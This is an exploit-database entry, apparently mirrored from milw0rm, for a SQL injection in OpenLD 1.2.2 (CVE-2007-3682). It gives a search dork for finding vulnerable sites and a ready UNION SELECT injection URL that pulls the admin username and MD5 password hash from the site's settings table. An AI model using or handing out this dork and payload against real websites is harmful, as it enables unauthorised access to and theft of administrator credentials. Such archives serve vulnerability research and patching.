[] NeoSense
E X P L O I T S
title author type platform port cve id

OpenLD 1.2.2 - 'index.php?id' SQL Injection

Author: CypherXero
type: webapps
platform: php
port: 
date_added: 2007-07-09 
date_updated:  
verified: 1 
codes: OSVDB-35966;CVE-2007-3682 
tags: 
aliases:  
screenshot_url:  
application_url: 
--==+================================================================================+==--
--==+                       OpenLD  <= 1.2.2 SQL Injection Exploit                   +==--
--==+================================================================================+==--
DISCOVERED BY: Cody "CypherXero" Rester
PAYLOAD: Admin username and MD5 Hash
WEBSITE: http://www.cypherxero.net

Shoutouts to my friends darkfusion and magikgrl for being fucking awesome. w0rd.
--==+================================================================================+==--

NOTES:

The table names may have an extension that is unique to the website. The standard table name
is "settings", but may be "openld_settngs" or possibly the name of the site.

DORK:

"Powered by OpenLD"

EXPLOITS:

http://www.website.com/index.php?id=999/**/UNION/**/SELECT/**/ALL/**/null,null,null,null,null,value,null,null,null,null,null,null,null,null/**/FROM/**/settings--

# milw0rm.com [2007-07-10]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.